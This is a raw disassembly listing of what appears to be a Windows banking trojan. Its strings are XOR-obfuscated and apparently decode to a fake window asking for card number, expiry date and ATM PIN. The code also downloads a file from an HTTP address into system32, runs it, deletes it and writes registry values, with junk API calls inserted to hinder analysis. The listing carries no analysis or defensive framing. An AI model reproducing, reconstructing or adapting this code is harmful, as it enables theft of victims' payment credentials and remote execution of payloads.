mov edi, [ebp+var_280]
push edi
push 80000002h
call sub_401490
add esp, 28h
mov ebx, eax
call sub_40C4C4 ; GetCurrentThreadId
or ebx, ebx
jz loc_408E52
call sub_40C518 ; GetProcessHeap
lea edi, [ebp+var_26D]
lea esi, byte_446989
xor ecx, ecx
inc ecx
rep movsb
push 104h
lea eax, [ebp+var_14A]
push eax
lea eax, [ebp+var_260]
push eax
call sub_40C4A0 ; ExpandEnvironmentStringsA
push 1Eh
push offset byte_446E01
call sub_408BAE
push eax
lea edi, [ebp+var_14A]
push edi
call sub_40C9F8
call sub_40C4C4 ; GetCurrentThreadId
call sub_404502
mov ebx, eax
lea edi, [ebp+var_274]
lea esi, aHt@zso ; "Ht@zSo"
mov ecx, 7
rep movsb
push 44h
push 0
lea eax, [ebp+var_44]
push eax
call sub_40C9A4
call sub_40C548 ; GetTickCount
push 44h
push 0
lea eax, [ebp+var_44]
push eax
call sub_40C9A4
add esp, 28h
mov [ebp+var_14C], 1CCDh
inc [ebp+var_14C]
mov [ebp+var_44], 44h
lea edi, [ebp+var_279]
lea esi, a7r ; "7R "
mov ecx, 5
rep movsb
mov [ebp+var_18], 1
mov [ebp+var_14], 1
or ebx, ebx
jz short loc_408DBB
lea eax, [ebp+var_44]
push eax
call sub_404590
pop ecx
jmp short loc_408DC1
; ---------------------------------------------------------------------------
loc_408DBB: ; CODE XREF: sub_408C55+158�j
mov [ebp+var_14], 0
loc_408DC1: ; CODE XREF: sub_408C55+164�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_44]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_14A]
push eax
push 0
call sub_40C6F8 ; CreateProcessA
or eax, eax
jz short loc_408E52
lea edi, [ebp+var_285]
lea esi, aG ; " "
mov ecx, 3
rep movsb
push [ebp+var_158]
call sub_40C530 ; CloseHandle
push 7530h
call sub_40C95C
pop ecx
mov [ebp+var_282], 26C2h
movzx eax, [ebp+var_282]
imul eax, 3CDCh
mov [ebp+var_282], ax
push 0
push [ebp+var_15C]
call sub_40C680 ; TerminateProcess
call sub_40C518 ; GetProcessHeap
push [ebp+var_15C]
call sub_40C530 ; CloseHandle
call sub_40C548 ; GetTickCount
loc_408E52: ; CODE XREF: sub_408C55+91�j
; sub_408C55+193�j
pop edi
pop esi
pop ebx
leave
retn
sub_408C55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E57 proc near ; CODE XREF: sub_408EFF+21�p
; sub_408EFF+3B�p ...
var_100C = dword ptr -100Ch
var_1007 = byte ptr -1007h
var_1001 = byte ptr -1001h
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_40C43C
push ebx
push esi
push edi
mov [ebp+var_2], 77B3h
movzx eax, [ebp+var_2]
imul eax, 7D32h
mov [ebp+var_2], ax
push 5
push [ebp+arg_0]
call sub_40C740 ; GetWindow
mov ebx, eax
loc_408E87: ; CODE XREF: sub_408E57+A1�j
or ebx, ebx
jnz short loc_408E8F
xor eax, eax
jmp short loc_408EFA
; ---------------------------------------------------------------------------
loc_408E8F: ; CODE XREF: sub_408E57+32�j
lea edi, [ebp+var_1007]
lea esi, aQy3 ; "qY3 `"
mov ecx, 3
rep movsw
push 0FFFh
lea eax, [ebp+var_1001]
push eax
push ebx
call sub_40C74C ; GetClassNameA
mov eax, 10h
sub eax, dword_43C098
push eax
push [ebp+arg_4]
lea eax, [ebp+var_1001]
push eax
call sub_4017D2
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_408EDE
mov eax, ebx
jmp short loc_408EFA
; ---------------------------------------------------------------------------
loc_408EDE: ; CODE XREF: sub_408E57+81�j
call sub_40C4C4 ; GetCurrentThreadId
push 2
push ebx
call sub_40C740 ; GetWindow
mov ebx, eax
mov eax, dword_44699F
mov [ebp+var_100C+1], eax
jmp short loc_408E87
; ---------------------------------------------------------------------------
loc_408EFA: ; CODE XREF: sub_408E57+36�j
; sub_408E57+85�j
pop edi
pop esi
pop ebx
leave
retn
sub_408E57 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EFF proc near ; CODE XREF: sub_40B090+227�p
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_156 = word ptr -156h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_141 = byte ptr -141h
var_139 = word ptr -139h
var_137 = byte ptr -137h
var_136 = byte ptr -136h
var_133 = byte ptr -133h
var_132 = byte ptr -132h
var_12C = word ptr -12Ch
var_12A = word ptr -12Ah
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_11F = byte ptr -11Fh
var_11E = word ptr -11Eh
var_11C = dword ptr -11Ch
var_115 = byte ptr -115h
var_114 = word ptr -114h
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = dword ptr -10Ah
var_106 = dword ptr -106h
var_102 = byte ptr -102h
var_3 = byte ptr -3
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 160h
push ebx
push esi
push edi
call sub_40C4C4 ; GetCurrentThreadId
push 9
push offset aAjfjgoFq ; "AjfJgo`fq"
call sub_40129C
push eax
push [ebp+arg_0]
call sub_408E57
mov ebx, eax
call sub_40C548 ; GetTickCount
push 8
push offset a@UijwW ; "@}uijw`w"
call sub_40129C
push eax
push ebx
call sub_408E57
mov ds:dword_41DA74, eax
call sub_40C548 ; GetTickCount
push 0
push ds:dword_41DA74
call sub_40C830 ; ShowWindow
call sub_40C4E8 ; RtlGetLastWin32Error
lea eax, [ebp+var_112]
push eax
push ebx
call sub_40C728 ; GetWindowRect
call sub_40C5D8 ; IsDebuggerPresent
push 0
push ds:dword_41EB6C
push 0
push ebx
mov eax, [ebp+var_106]
sub eax, [ebp+var_10E]
push eax
mov eax, [ebp+var_10A]
sub eax, [ebp+var_112]
push eax
push 0
push 0
push 50800000h
push offset byte_4474F5
push offset aKkqhook ; "KKQHOOK"
push 200h
call sub_40C83C ; CreateWindowExA
mov ds:dword_41FC74, eax
call sub_40C5D8 ; IsDebuggerPresent
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp+var_148], eax
push 19h
push offset dword_446DC4
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
add edi, 2Dh
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43C098
add edi, 5
push edi
mov edi, dword_43C094
add edi, 13h
push edi
push 50800000h
push eax
mov edi, [ebp+var_148]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_41DA70, eax
mov ax, word_4469A3
mov [ebp+var_12A], ax
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C094
add edi, 12Bh
push edi
mov edi, [ebp+var_10A]
sub edi, [ebp+var_112]
sub edi, 64h
push edi
mov edi, dword_43C098
add edi, 42h
push edi
mov edi, dword_43C098
add edi, 5
push edi
push 50800009h
push offset byte_4474F5
push eax
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_430C5C, eax
call sub_40C554 ; GetVersion
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 2BCh
push 0
push 0
mov eax, dword_43C098
mov edx, 17h
sub edx, eax
push edx
mov eax, dword_43C098
add eax, 5
push eax
call sub_40C89C ; CreateFontA
mov [ebp+var_128], eax
push 1
push eax
push 30h
push ds:dword_41DA70
call sub_40C80C ; SendMessageA
call sub_40C518 ; GetProcessHeap
push 8
push offset aFjhgjgj ; "FJHGJGJ]"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_430C5C
mov edi, dword_43C094
add edi, 12Bh
push edi
mov edi, dword_43C098
add edi, 23h
push edi
mov edi, dword_43C098
add edi, 2Bh
push edi
mov edi, dword_43C094
add edi, 13h
push edi
push 50800003h
push offset byte_4474F5
push eax
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_432DC4, eax
mov ax, word_4469A5
mov [ebp+var_12C], ax
push 8
push offset aFjhgjgj ; "FJHGJGJ]"
call sub_40129C
add esp, 48h
push 0
push ds:dword_41EB6C
push 0
push ds:dword_430C5C
mov edi, dword_43C094
add edi, 12Bh
push edi
mov edi, dword_43C094
add edi, 3Bh
push edi
mov edi, dword_43C098
add edi, 2Bh
push edi
mov edi, dword_43C094
add edi, 51h
push edi
push 50800003h
push offset byte_4474F5
push eax
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_41EB64, eax
mov [ebp+var_2], 1
jmp loc_40926D
; ---------------------------------------------------------------------------
loc_4091CC: ; CODE XREF: sub_408EFF+375�j
mov byte ptr [ebp+var_154+1], 0F0h
sub byte ptr [ebp+var_154+1], 3Ch
mov ax, word_4469A7
mov [ebp+var_156], ax
push 4
push offset a7p ; " +7p"
call sub_40129C
movzx edi, [ebp+var_2]
push edi
push eax
lea edi, [ebp+var_154+2]
push edi
call sub_40C9D4
lea eax, [ebp+var_154+2]
push eax
push 0
push 143h
push ds:dword_432DC4
call sub_40C80C ; SendMessageA
push 6
push offset a757p ; "75 +7p"
call sub_40129C
movzx edi, [ebp+var_2]
add edi, 4
push edi
push eax
lea edi, [ebp+var_154+2]
push edi
call sub_40C9D4
add esp, 28h
mov byte ptr [ebp+var_154], 0CCh
add byte ptr [ebp+var_154], 0C7h
lea eax, [ebp+var_154+2]
push eax
push 0
push 143h
push ds:dword_41EB64
call sub_40C80C ; SendMessageA
inc [ebp+var_2]
loc_40926D: ; CODE XREF: sub_408EFF+2C8�j
movzx eax, [ebp+var_2]
cmp eax, 0Dh
jl loc_4091CC
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp+var_14C], eax
push 10h
push offset aJpwFdwaKphgW ; "\\jpw%fdwa%kphg`w"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
inc edi
push edi
mov edi, dword_43C098
add edi, 58h
push edi
mov edi, dword_43C094
add edi, 6Dh
push edi
mov edi, dword_43C098
add edi, 0B4h
push edi
push 50000000h
push eax
mov edi, [ebp+var_14C]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_413E18, eax
lea edi, [ebp+var_132]
lea esi, aKgH ; "KG H^"
mov ecx, 3
rep movsw
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp+var_150], eax
push 0Fh
push offset a@UlwdqljkAdq ; "@}ulwdqljk%adq`"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
inc edi
push edi
mov edi, dword_43C098
add edi, 48h
push edi
mov edi, dword_43C094
add edi, 90h
push edi
mov edi, dword_43C098
add edi, 0B4h
push edi
push 50000000h
push eax
mov edi, [ebp+var_150]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_432DBC, eax
lea edi, [ebp+var_133]
lea esi, byte_4469AF
xor ecx, ecx
inc ecx
rep movsb
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp+var_154], eax
push 0Ch
push offset aDqhUlkFja ; "DQH%ULK(Fja`"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
inc edi
push edi
mov edi, dword_43C098
add edi, 47h
push edi
mov edi, dword_43C098
add edi, 0AAh
push edi
mov edi, dword_43C098
add edi, 0B4h
push edi
push 50000000h
push eax
mov edi, [ebp+var_154]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_4350B4, eax
call sub_40C554 ; GetVersion
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp-158h], eax
push 4Ah
push offset word_446D36
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
inc edi
push edi
mov edi, dword_43C094
add edi, 1E3h
push edi
mov edi, dword_43C098
add edi, 0D7h
push edi
mov edi, dword_43C098
add edi, 0Fh
push edi
push 50000000h
push eax
mov edi, [ebp-158h]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_432DC0, eax
push 6
push offset aVqdqlf ; "VQDQLF"
call sub_40129C
mov [ebp+var_15C], eax
push 26h
push offset aUiDvHdnFjwwFql ; "Ui`dv`%hdn`%fjww`fqljkv%dka%qw|%dbdlk+"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C094
add edi, 0Fh
push edi
mov edi, dword_43C098
add edi, 0EEh
push edi
mov edi, dword_43C098
add edi, 0F0h
push edi
mov edi, dword_43C098
add edi, 0Fh
push edi
push 50000000h
push eax
mov edi, [ebp+var_15C]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_43A398, eax
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_136]
lea esi, aZ_0 ; "z "
mov ecx, 3
rep movsb
push offset byte_433F40
lea eax, [ebp+var_102]
push eax
call sub_40C9D4
add esp, 58h
call sub_40C5D8 ; IsDebuggerPresent
mov [ebp+var_3], 4
jmp short loc_409529
; ---------------------------------------------------------------------------
loc_409519: ; CODE XREF: sub_408EFF+62F�j
movzx eax, [ebp+var_3]
mov [ebp+eax+var_102], 78h
add [ebp+var_3], 1
loc_409529: ; CODE XREF: sub_408EFF+618�j
mov al, [ebp+var_3]
cmp al, 0Ch
jb short loc_409519
mov [ebp+var_114], 754Eh
sub [ebp+var_114], 4E66h
push 4
push offset a@alq ; "@ALQ"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_430C5C
mov edi, dword_43C094
add edi, 17h
push edi
mov edi, dword_43C094
add edi, 81h
push edi
mov edi, dword_43C098
add edi, 5
push edi
push edi
push 50800800h
lea edi, [ebp+var_102]
push edi
push eax
push 200h
call sub_40C83C ; CreateWindowExA
mov ds:dword_410630, eax
call sub_40C4B8 ; GetCurrentProcessId
push 4
push offset a@alq ; "@ALQ"
call sub_40129C
push 0
push ds:dword_41EB6C
push 0
push ds:dword_430C5C
mov edi, dword_43C098
add edi, 9
push edi
mov edi, dword_43C098
add edi, 37h
push edi
mov edi, dword_43C094
add edi, 5Eh
push edi
mov edi, dword_43C098
add edi, 5
push edi
push 50800000h
push offset byte_4474F5
push eax
push 200h
call sub_40C83C ; CreateWindowExA
mov ds:dword_41EB5C, eax
call sub_40C548 ; GetTickCount
push 0
push 78h
push 0CCh
push ds:dword_41EB5C
call sub_40C80C ; SendMessageA
call sub_40C548 ; GetTickCount
push 6
push offset aGpqqjk ; "GPQQJK"
call sub_40129C
mov [ebp+var_160], eax
push 16h
push offset aFilfnJkfQjFjkq ; "Filfn%Jkf`%Qj%Fjkqlkp`"
call sub_40129C
add esp, 20h
push 0
push ds:dword_41EB6C
push 0
push ds:dword_41FC74
mov edi, dword_43C098
add edi, 8
push edi
mov edi, dword_43C098
add edi, 8Ch
push edi
mov edi, dword_43C098
add edi, 131h
push edi
mov edi, dword_43C094
add edi, 1Dh
push edi
push 50800000h
push eax
mov edi, [ebp+var_160]
push edi
push 0
call sub_40C83C ; CreateWindowExA
mov ds:dword_4350B8, eax
lea edi, [ebp+var_137]
lea esi, byte_4469B3
xor ecx, ecx
inc ecx
rep movsb
push 0
push 2
push 0
push 0
push 5
push 1
push 0
push 0
push 0
push 190h
push 0
push 0
mov eax, dword_43C098
mov edx, 15h
sub edx, eax
push edx
mov eax, dword_43C098
inc eax
push eax
call sub_40C89C ; CreateFontA
mov ebx, eax
mov ax, word_4469B4
mov [ebp+var_139], ax
push 1
push ebx
push 30h
push ds:dword_432DC4
call sub_40C80C ; SendMessageA
call sub_40C518 ; GetProcessHeap
push 1
push ebx
push 30h
push ds:dword_41EB64
call sub_40C80C ; SendMessageA
mov [ebp+var_115], 67h
add [ebp+var_115], 66h
push 1
push ebx
push 30h
push ds:dword_410630
call sub_40C80C ; SendMessageA
call sub_40C4C4 ; GetCurrentThreadId
push 1
push ebx
push 30h
push ds:dword_41EB5C
call sub_40C80C ; SendMessageA
call sub_40C4E8 ; RtlGetLastWin32Error
push 1
push ebx
push 30h
push ds:dword_432DBC
call sub_40C80C ; SendMessageA
mov [ebp+var_11C], 7D69h
inc [ebp+var_11C]
push 1
push ebx
push 30h
push ds:dword_413E18
call sub_40C80C ; SendMessageA
mov [ebp+var_11E], 2C4Fh
sub [ebp+var_11E], 6B92h
push 1
push ebx
push 30h
push ds:dword_4350B4
call sub_40C80C ; SendMessageA
push 1
push ebx
push 30h
push ds:dword_4350B8
call sub_40C80C ; SendMessageA
call sub_40C4B8 ; GetCurrentProcessId
push 0FFFFFFFCh
push ds:dword_432DC4
call sub_40C7AC ; GetWindowLongA
mov ds:dword_41FB64, eax
call sub_40C5D8 ; IsDebuggerPresent
push offset sub_40AF80
push 0FFFFFFFCh
push ds:dword_432DC4
call sub_40C7B8 ; SetWindowLongA
call sub_40C554 ; GetVersion
push 0FFFFFFFCh
push ds:dword_41EB64
call sub_40C7AC ; GetWindowLongA
mov ds:dword_41EB60, eax
push offset sub_40AF80
push 0FFFFFFFCh
push ds:dword_41EB64
call sub_40C7B8 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_410630
call sub_40C7AC ; GetWindowLongA
mov ds:dword_40DFD0, eax
push offset sub_40AF80
push 0FFFFFFFCh
push ds:dword_410630
call sub_40C7B8 ; SetWindowLongA
push 0FFFFFFFCh
push ds:dword_41EB5C
call sub_40C7AC ; GetWindowLongA
mov ds:dword_413E14, eax
lea edi, [ebp+var_141]
lea esi, aWvqrQ ; "WVqr^:Q"
movsd
movsd
push offset sub_40AF80
push 0FFFFFFFCh
push ds:dword_41EB5C
call sub_40C7B8 ; SetWindowLongA
mov [ebp+var_11F], 0A8h
add [ebp+var_11F], 1
push ds:dword_432DC4
call sub_40C758 ; SetFocus
mov [ebp+var_124], 2167h
inc [ebp+var_124]
pop edi
pop esi
pop ebx
leave
retn
sub_408EFF endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_409883 proc near ; DATA XREF: sub_40A74E+79A�o
var_55CC = dword ptr -55CCh
var_55C6 = byte ptr -55C6h
var_55BE = byte ptr -55BEh
var_55B6 = word ptr -55B6h
var_55B4 = dword ptr -55B4h
var_55AE = byte ptr -55AEh
var_4710 = byte ptr -4710h
var_4708 = dword ptr -4708h
var_4701 = byte ptr -4701h
var_46FE = byte ptr -46FEh
var_46FD = byte ptr -46FDh
var_46F7 = byte ptr -46F7h
var_46F2 = byte ptr -46F2h
var_46EA = word ptr -46EAh
var_46E8 = dword ptr -46E8h
var_46E4 = dword ptr -46E4h
var_46DE = byte ptr -46DEh
var_46DD = byte ptr -46DDh
var_46DC = dword ptr -46DCh
var_46D8 = dword ptr -46D8h
var_46D1 = byte ptr -46D1h
var_46D0 = byte ptr -46D0h
var_46CC = dword ptr -46CCh
var_46C8 = dword ptr -46C8h
var_46C4 = dword ptr -46C4h
var_46C0 = dword ptr -46C0h
var_46BC = dword ptr -46BCh
var_46B8 = dword ptr -46B8h
var_46B2 = byte ptr -46B2h
var_45B3 = byte ptr -45B3h
var_45AF = byte ptr -45AFh
var_35D2 = byte ptr -35D2h
var_35CC = word ptr -35CCh
var_35CA = word ptr -35CAh
var_35C7 = byte ptr -35C7h
var_35BF = byte ptr -35BFh
var_35B8 = dword ptr -35B8h
var_35B4 = dword ptr -35B4h
var_35B0 = dword ptr -35B0h
var_35A9 = byte ptr -35A9h
var_35A2 = word ptr -35A2h
var_35A0 = dword ptr -35A0h
var_359B = byte ptr -359Bh
var_259C = byte ptr -259Ch
var_2599 = byte ptr -2599h
var_2597 = byte ptr -2597h
var_15A8 = dword ptr -15A8h
var_15A4 = dword ptr -15A4h
var_159E = byte ptr -159Eh
var_159D = byte ptr -159Dh
var_159A = word ptr -159Ah
var_1598 = dword ptr -1598h
var_1144 = byte ptr -1144h
var_113F = byte ptr -113Fh
var_1139 = byte ptr -1139h
var_1138 = byte ptr -1138h
var_1133 = byte ptr -1133h
var_112E = word ptr -112Eh
var_112C = byte ptr -112Ch
var_1125 = byte ptr -1125h
var_1124 = byte ptr -1124h
var_111F = byte ptr -111Fh
var_1020 = dword ptr -1020h
var_101B = byte ptr -101Bh
var_101A = byte ptr -101Ah
var_1019 = byte ptr -1019h
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = byte ptr -1010h
var_F0C = dword ptr -0F0Ch
var_F08 = byte ptr -0F08h
var_708 = dword ptr -708h
var_703 = byte ptr -703h
var_604 = dword ptr -604h
var_600 = byte ptr -600h
var_5A8 = byte ptr -5A8h
var_5A7 = byte ptr -5A7h
var_400 = byte ptr -400h
push ebp
mov ebp, esp
mov eax, 55CCh
call sub_40C43C
push ebx
push esi
push edi
call sub_40C4B8 ; GetCurrentProcessId
lea edi, [ebp+var_1124]
lea esi, aO8_ ; "O 8."
mov ecx, 5
rep movsb
lea edi, [ebp+var_1125]
lea esi, byte_4469C3
xor ecx, ecx
inc ecx
rep movsb
lea edi, [ebp+var_112C]
lea esi, aOacPl ; "oac-Pl"
mov ecx, 7
rep movsb
mov ax, word_4469CB
mov [ebp+var_112E], ax
lea edi, [ebp+var_1133]
lea esi, aW9 ; " +W9"
mov ecx, 5
rep movsb
call sub_40C548 ; GetTickCount
push eax
call sub_40C9E0
pop ecx
call sub_40C5D8 ; IsDebuggerPresent
loc_409900: ; CODE XREF: sub_409883+E5B�j
mov eax, dword_43C094
add eax, 7
push eax
lea eax, [ebp+var_703]
push eax
call sub_4016D2
call sub_40C4B8 ; GetCurrentProcessId
push 9
push offset aVyVAdq ; " vY v+adq"
call sub_40129C
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9D4
call sub_40C4C4 ; GetCurrentThreadId
lea eax, [ebp+var_400]
push eax
call sub_4034C6
push 9
push offset aMqqu?V ; "mqqu?** v"
call sub_40129C
mov edi, dword_43C0B8
push off_43C0C0[edi*4]
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40C9D4
mov [ebp+var_101A], 3Ch
add [ebp+var_101A], 0D7h
push 1
push offset asc_446CD6 ; "*"
call sub_40129C
mov edi, 10h
sub edi, dword_43C098
push edi
push eax
mov edi, dword_43C0B8
push off_43C0C0[edi*4]
call sub_4017D2
add esp, 4Ch
cmp eax, 0FFFFh
jnz short loc_4099D5
push 9
push offset aRdfhUmu ; "*rdfh+umu"
call sub_40129C
push eax
lea edi, [ebp+var_F08]
push edi
call sub_40C9F8
add esp, 10h
loc_4099D5: ; CODE XREF: sub_409883+134�j
call sub_40C4E8 ; RtlGetLastWin32Error
and [ebp+var_1018], 0
mov [ebp+var_1020], 4
call sub_40C4E8 ; RtlGetLastWin32Error
push 1Ah
push offset aVjcqrdwYhlfwjv ; "Vjcqrdw`YHlfwjvjcqYRlkajrv"
call sub_40129C
mov [ebp+var_1598], eax
push 3
push offset aLcf ; "lcf"
call sub_40129C
lea edi, [ebp+var_1138]
push edi
lea edi, [ebp+var_1020]
push edi
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp+var_1598]
push edi
push 80000001h
call sub_401490
lea edi, [ebp+var_1139]
lea esi, byte_4469D2
xor ecx, ecx
inc ecx
rep movsb
push 7
push offset aLcf8P ; ":lcf8 p"
call sub_40129C
push [ebp+var_1018]
push eax
lea edi, [ebp+var_111F]
push edi
call sub_40C9D4
lea eax, [ebp+var_111F]
push eax
lea eax, [ebp+var_F08]
push eax
call sub_40C9F8
lea edi, [ebp+var_113F]
lea esi, aZis8 ; " ZIs8"
mov ecx, 3
rep movsw
push 1
push offset aT ; "t"
call sub_40129C
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_F08]
push edi
push 0
call sub_4062A9
add esp, 6Ch
mov ebx, eax
or ebx, ebx
jnz short loc_409AFE
mov [ebp+var_159A], 7656h
add [ebp+var_159A], 78E9h
lea eax, [ebp+var_400]
push eax
call sub_40355C
pop ecx
lea edi, [ebp+var_159D]
lea esi, aKa ; "KA"
mov ecx, 3
rep movsb
jmp loc_40A5CE
; ---------------------------------------------------------------------------
loc_409AFE: ; CODE XREF: sub_409883+242�j
and [ebp+var_1018], 0
push 1Ah
push offset aVjcqrdwYhlfwjv ; "Vjcqrdw`YHlfwjvjcqYRlkajrv"
call sub_40129C
mov [ebp-159Ch], eax
push 3
push offset aLcf ; "lcf"
call sub_40129C
push 4
push 4
lea edi, [ebp+var_1018]
push edi
push eax
mov edi, [ebp-159Ch]
push edi
push 80000001h
call sub_4015B0
call sub_40C554 ; GetVersion
push 0
lea eax, [ebp+var_400]
push eax
call sub_401A43
add esp, 30h
mov [ebp+var_F0C], eax
or eax, eax
jz loc_40A5CE
call sub_40C4B8 ; GetCurrentProcessId
lea eax, [ebp+var_400]
push eax
call sub_40C488 ; DeleteFileA
call sub_40C554 ; GetVersion
lea eax, [ebp+var_400]
push eax
call sub_40355C
pop ecx
call sub_40C548 ; GetTickCount
and [ebp+var_708], 0
jmp loc_40A587
; ---------------------------------------------------------------------------
loc_409B98: ; CODE XREF: sub_409883+D27�j
call sub_40C4C4 ; GetCurrentThreadId
cmp [ebp+var_600], 0
jz loc_40A587
call sub_40C548 ; GetTickCount
lea ecx, [ebp+var_600]
or eax, 0FFFFFFFFh
loc_409BB8: ; CODE XREF: sub_409883+33A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409BB8
cmp eax, 5Ch
jb loc_40A587
call sub_40C554 ; GetVersion
mov [ebp+var_5A8], 0
lea edi, [ebp+var_35A9]
lea esi, aVHE ; "~H:!e"
mov ecx, 7
rep movsb
push 0FFFh
lea eax, [ebp+var_259C]
push eax
lea eax, [ebp+var_5A7]
push eax
call sub_408A4F
push 0FFFh
lea eax, [ebp+var_359B]
push eax
lea eax, [ebp+var_600]
push eax
call sub_408A4F
add esp, 18h
mov [ebp+var_159E], 0
call sub_40C518 ; GetProcessHeap
mov [ebp+var_159D], 0
jmp short loc_409C4D
; ---------------------------------------------------------------------------
loc_409C2F: ; CODE XREF: sub_409883+3E3�j
movzx eax, [ebp+var_159D]
lea edx, [ebp+eax+var_259C]
movsx ecx, byte ptr [edx]
sub ecx, eax
mov eax, ecx
mov [edx], al
add [ebp+var_159D], 1
loc_409C4D: ; CODE XREF: sub_409883+3AA�j
lea ecx, [ebp+var_259C]
or eax, 0FFFFFFFFh
loc_409C56: ; CODE XREF: sub_409883+3D8�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C56
movzx esi, [ebp+var_159D]
cmp esi, eax
jb short loc_409C2F
mov [ebp+var_35A0], 7884h
inc [ebp+var_35A0]
lea ecx, [ebp+var_259C]
or eax, 0FFFFFFFFh
loc_409C81: ; CODE XREF: sub_409883+403�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_409C81
lea esi, [ebp+var_359B]
push esi
push eax
lea edi, [ebp+var_259C]
push edi
call sub_408884
add esp, 0Ch
mov [ebp+var_35B0], eax
mov [ebp+var_35A2], 400Ah
inc [ebp+var_35A2]
push 5
push offset aRuvq ; "ruvq%"
call sub_40129C
add esp, 8
mov edi, 10h
sub edi, dword_43C098
push edi
push eax
lea edi, [ebp+var_259C]
push edi
call sub_4017D2
add esp, 0Ch
cmp eax, 0
jnz loc_40A220
call sub_40C548 ; GetTickCount
mov ax, word_4469E3
mov [ebp+var_46EA], ax
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_2597]
push eax
lea eax, [ebp+var_45B3]
push eax
call sub_40C45C
lea edi, [ebp+var_46F2]
lea esi, aQ1Q5k ; "Q1^Q!5k"
mov ecx, 8
rep movsb
mov [ebp+var_35B4], 0
mov [ebp+var_46B8], 4
call sub_40C554 ; GetVersion
lea eax, [ebp+var_46D0]
push eax
lea eax, [ebp+var_46B8]
push eax
lea eax, [ebp+var_35B4]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
call sub_401490
add esp, 18h
call sub_40C518 ; GetProcessHeap
mov eax, 17h
sub eax, dword_43C098
push eax
lea eax, [ebp+var_703]
push eax
call sub_4016D2
add esp, 8
call sub_40C548 ; GetTickCount
push 9
push offset aVyVAdq ; " vY v+adq"
call sub_40129C
add esp, 8
lea edi, [ebp+var_703]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push eax
lea edi, [ebp+var_400]
push edi
call sub_40C9D4
add esp, 10h
call sub_40C4E8 ; RtlGetLastWin32Error
push 1
push offset aT ; "t"
call sub_40129C
add esp, 8
lea edi, [ebp+var_604]
push edi
push 0
push 0
push eax
push offset aKkqhook ; "KKQHOOK"
lea edi, [ebp+var_400]
push edi
lea edi, [ebp+var_45B3]
push edi
push offset dword_41FB70
call sub_4062A9
add esp, 20h
mov ebx, eax
call sub_40C548 ; GetTickCount
cmp ebx, 0
jnz short loc_409E30
call sub_40C518 ; GetProcessHeap
lea eax, [ebp+var_400]
push eax
call sub_40355C
add esp, 4
lea edi, [ebp+var_4701]
lea esi, a1g ; "1G"
mov ecx, 3
rep movsb
jmp short loc_409E9E
; ---------------------------------------------------------------------------
loc_409E30: ; CODE XREF: sub_409883+582�j
push 4
push 4
lea eax, [ebp+var_604]
push eax
push offset aOfstkkq ; "ofstkkq"
push offset aSoftwareMicros ; "Software\\Microsoft\\Windows"
push 80000001h
